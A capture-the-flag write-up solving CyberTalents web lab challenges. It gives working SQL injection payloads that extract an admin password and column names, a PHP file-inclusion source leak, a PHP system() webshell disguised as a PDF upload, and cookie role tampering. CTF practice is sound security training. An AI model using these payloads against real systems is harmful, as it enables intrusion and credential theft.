# CYBERTALENTS WEB CHALLENGES WRITEUPS

## ADMIN HAS THE POWER

When we open the link we are taken to a login page. I tried *admin* as the username and *admin* as the password, but it didn't go through, so I decided to take a look at the source code.

```
┌──(c0d3x㉿pawn)-[~]
└─$ curl http://wcamxwl32pue3e6m5p6v4ehxzg1rm2360kxlcg30-web.cybertalentslabs.com
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <title>Admin Panel</title>
    <!-- Bootstrap -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
    <!-- TODO: remove this line , for maintenance purpose use this info (user:support password:x34245323)-->
  </head>
  <body>
    <div class="container" style="padding-top :150px;">
      <div class="row">
        <div class="col-sm-6 col-sm-offset-3">
          <form class="form-horizontal" method="post" action="">
            <div class="form-group">
              <label for="username" class="col-sm-2 control-label">Username</label>
              <div class="col-sm-10">
                <input name="username" type="text" class="form-control" id="username" placeholder="Username">
              </div>
            </div>
            <div class="form-group">
              <label for="password" class="col-sm-2 control-label">Password</label>
              <div class="col-sm-10">
                <input name="password" type="password" class="form-control" id="password" placeholder="Password">
              </div>
            </div>
            <div class="form-group">
              <div
class="col-sm-offset-2 col-sm-10">
                <button type="submit" class="btn btn-default">Sign in</button>
              </div>
            </div>
          </form>
        </div>
      </div>
    </div>
    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
    <script>
    </script>
  </body>
</html>
```

The HTML comment left in the `<head>` gives away a maintenance account, *(user:support password:x34245323)*, so I gave it a shot. I logged in, but there was no flag; instead we were left a clue.

![](https://i.imgur.com/aJoZBrc.png)

The clue says we need better privileges, which means admin. I took a look at the cookies with the Cookie-Editor extension, saw a cookie named `role`, and changed its value to `admin`.

![](https://i.imgur.com/uWE8AWe.png)

Baaang!! You get the flag.

The underlying bug is that the application reads the user's role back out of a cookie the client fully controls and never checks it against anything it holds itself. The role belongs in the server-side session, or at the very least in a cookie whose value is signed so that an edited `role=admin` is rejected.

## THIS IS SPARTA

In this challenge we find ourselves at a login page. I tried the common usernames and passwords, but none of them worked, so I looked at the source code and there it was: obfuscated JavaScript. I decoded it with [de4js](https://lelinhtinh.github.io/de4js/) and got the following.

![](https://i.imgur.com/uDQpVq8.png)

So we see an array of words.
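Resolving `_0xae5b[n]` by hand is fine for seven strings but gets error-prone on real string tables with hundreds of entries. As an added example (my script, not part of the original writeup or of the challenge), here is a small Python deobfuscator for exactly this obfuscator pattern: it parses the `var _0x... = [...]` string table, inlines every `NAME[i]` reference as its string literal, folds `document["getElementById"]` back into dot notation, renames the `_0x...x2`-style locals, and lists the literals the script compares input against. Its input is the de4js output reproduced just below, embedded as a constant so it runs offline; the `v1`, `v2` names it assigns are its own.

```python
import ast
import json
import re

# Constructed input: the array-indexed snippet that de4js recovered for
# THIS IS SPARTA, copied verbatim so the script runs offline.
OBFUSCATED = r'''var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", " Congratz \x0A\x0A", "wrong Password"];
function check() {
    var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]];
    var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]];
    if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) {
        alert(_0xae5b[5]);
    } else {
        alert(_0xae5b[6]);
    }
}'''

# `var _0xabcd = [ ... ];` -- the string table every other reference indexes into.
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-f]+)\s*=\s*\[(.*?)\];', re.S)
# Bracket access with a plain identifier string: obj["name"] -> obj.name
DOT_RE = re.compile(r'\["([A-Za-z_$][\w$]*)"\]')
# Obfuscator-style local names such as _0xeb80x2 (the table name has no x<digits> tail)
LOCAL_RE = re.compile(r'\b_0x[0-9a-f]+x\d+\b')


def parse_string_table(src):
    """Return (array_name, strings) for the first string table in `src`.

    The JS array literal is close enough to a Python list literal (double-quoted
    strings, \\xNN escapes) that ast.literal_eval decodes it without evaluating code.
    """
    m = ARRAY_RE.search(src)
    if m is None:
        raise ValueError("no string table found")
    return m.group(1), list(ast.literal_eval("[" + m.group(2) + "]"))


def deobfuscate(src):
    """Inline every `NAME[i]` as its string literal, fold obj["x"] into obj.x,
    and give the obfuscated locals short readable names (v1, v2, ...)."""
    name, table = parse_string_table(src)
    out = ARRAY_RE.sub("", src, count=1)          # the table itself is no longer needed
    ref = re.compile(re.escape(name) + r"\[(\d+)\]")
    out = ref.sub(lambda m: json.dumps(table[int(m.group(1))]), out)
    out = DOT_RE.sub(r".\1", out)
    for n, old in enumerate(dict.fromkeys(LOCAL_RE.findall(out)), start=1):
        out = re.sub(r"\b" + re.escape(old) + r"\b", f"v{n}", out)
    return out.strip()


def hardcoded_comparisons(js):
    """String literals the (deobfuscated) script compares a value against with ==.
    For a client-side login check these are the credentials."""
    return re.findall(r'==\s*"((?:[^"\\]|\\.)*)"', js)


if __name__ == "__main__":
    clean = deobfuscate(OBFUSCATED)
    print(clean)
    print("compared against:", hardcoded_comparisons(clean))
```

Running it prints the readable `check()` and reports `Cyber-Talent` twice, once for each field; the point being that any check done in the browser ships its secret to the attacker no matter how it is encoded.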
```
var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", " Congratz \x0A\x0A", "wrong Password"];
function check() {
    var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]];
    var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]];
    if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) {
        alert(_0xae5b[5]);
    } else {
        alert(_0xae5b[6]);
    }
}
```

Every `_0xae5b[n]` is just an index into that array (`[0]` is `"value"`, `[1]` is `"user"`, `[2]` is `"getElementById"`, `[3]` is `"pass"`, `[4]` is `"Cyber-Talent"`), so substituting the strings back in gives:

```
var _0xeb80x2 = document.getElementById("user").value;
var _0xeb80x3 = document.getElementById("pass").value;
if (_0xeb80x2 == "Cyber-Talent" && _0xeb80x3 == "Cyber-Talent") {
    alert(" Congratz \x0A\x0A");
} else {
    alert("wrong Password");
}
```

So the username and the password should both be *Cyber-Talent*. The whole check runs in the browser, so the credentials were never a secret to begin with. When we log in with these credentials we see a pop-up containing the flag.

![](https://i.imgur.com/RV6mw5K.gif)

## SHARE THE IDEAS

When we click the link we are taken to a page where we have to log in before we can comment. I created an account and logged in. I typed *a* and it was added to the comments. I added a *'* and got an error, which told me the site is vulnerable to SQL injection; the error message also showed that it uses SQLite. To confirm the SQLite version, the following payload worked:

```
a' || (select sqlite_version()));--
```

`||` is SQLite's string concatenation operator, so the subquery's result gets glued onto the comment text and displayed back to us. Next I wanted to know what tables are in the database. `sqlite_master` stores the `CREATE` statement of every table, so I ran:

```
a' || (select sql from sqlite_master));--
```

which showed the following:

![](https://i.imgur.com/ziCQfbZ.png)

With the schema known (a `xde43_users` table with `password` and `role` columns), coming up with the final payload to pull the admin's password was easy:

```
a' || (select password from xde43_users where role="admin"));--
```

(SQLite accepts the double-quoted `"admin"` as a string literal only because no column of that name exists; `'admin'` is the portable spelling.)

![](https://i.imgur.com/oO09RvW.jpg)

## DARK PROJECT

On clicking the link we get to a website that at first looks completely normal, until you start clicking Contact, About and Project and notice that nothing changes.
So I looked at the URL and noticed something very fishy:

```
http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=about
```

The `home` parameter names a file that `index.php` includes (the application evidently appends `.php` itself, which is why `resource=index` below maps to `index.php`), so this is a local file inclusion. Asking for `index.php` directly would just execute it; wrapping the path in PHP's `php://filter` stream with the `convert.base64-encode` filter makes PHP hand back the file's source as base64 instead of running it. That payload worked like magic:

```
http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=php://filter/convert.base64-encode/resource=index
```

![](https://i.imgur.com/tYHCCSS.png)

Since the output is a base64 string, I copied it into [CyberChef](https://gchq.github.io/CyberChef/) and decoded it.

![](https://i.imgur.com/TfLexPp.png)

## JOIN TEAM

This challenge was a bit tricky, but after doing some research I was able to come up with the solution. There is a place to upload files, but only .pdf files are allowed.

![](https://i.imgur.com/JeSKYY4.png)

So I did the following:

```
┌──(c0d3x㉿pawn)-[~]
└─$ echo "<?php system('ls'); ?>" > test.txt

┌──(c0d3x㉿pawn)-[~]
└─$ mv test.txt test.pdf
```

I uploaded test.pdf and magic!! It was accepted: the check is on the file extension only, not on the file's content (a real PDF starts with `%PDF-`; this one starts with `<?php`).

![](https://i.imgur.com/kQSu9VS.png)

![](https://i.imgur.com/2VxGqBv.png)

I clicked on test.pdf and noticed something in the URL...

![](https://i.imgur.com/w5eaRWi.png)

The file had been stored as */data/test.pdf*. `index.php` takes a `jobs` parameter, and like `home` in DARK PROJECT it includes the file it is given, so I pointed it at the upload:

```
http://wcamxwl32pue3e6m86dv92kb4zlgm2360kxlcg30-web.cybertalentslabs.com/index.php?jobs=data/test.pdf
```

An included file is parsed as PHP whatever its extension, so the `ls` command was executed.

![](https://i.imgur.com/MBKASUU.png)

I then changed the PHP in the upload to:

```
<?php system('cat index.php'); ?>
```

and after uploading and including it the same way we get the flag.

## I AM A LEGEND

In this challenge we are given a login page. I tried the default credentials but couldn't log in. I took a look at the source code and saw JSFuck-obfuscated code.

![](https://i.imgur.com/PeSil5b.png)

Look at the link below; it'll shed some light on how to decode the JSFuck ;).
[https://medium.com/@vladtoie/cybertalents-iam-legend-web-challenge-writeup-cca64d3c09f](https://medium.com/@vladtoie/cybertalents-iam-legend-web-challenge-writeup-cca64d3c09f)

## WEIRD BLOQ

This was some weird blog, as the name says. I went to the search bar and searched for a random word, but it showed no results. I thought for a while and decided to search for the following:

```
a || b
```

After searching for it, the following was displayed.

![](https://i.imgur.com/t8Xgi4H.png)

I fuzzed the URL and found a robots.txt file. It pointed at a *git.phps* file, which was downloadable and contained the source code:

![](https://i.imgur.com/Jwdm2LR.png)

After minutes of research I finally found a payload that could get the flag:

```
h%a' uNion(sElect(t.cOlumn_name)from(sElect(cOlumn_name),(table_namE)from(infOrmation_schema.COLUMNS)having(table_namE)=('FL@g'))t)#
```

The odd shape is filter evasion: the keywords are written in mixed case to get past a keyword check that only matches one spelling, and parentheses stand in for every space so no whitespace appears in the payload. What it actually does is close the quoted search string (`h%a'`), `UNION` a one-column query that reads the column names of the `FL@g` table out of `information_schema.COLUMNS` through the derived table `t`, and comment out the rest of the original query with `#`.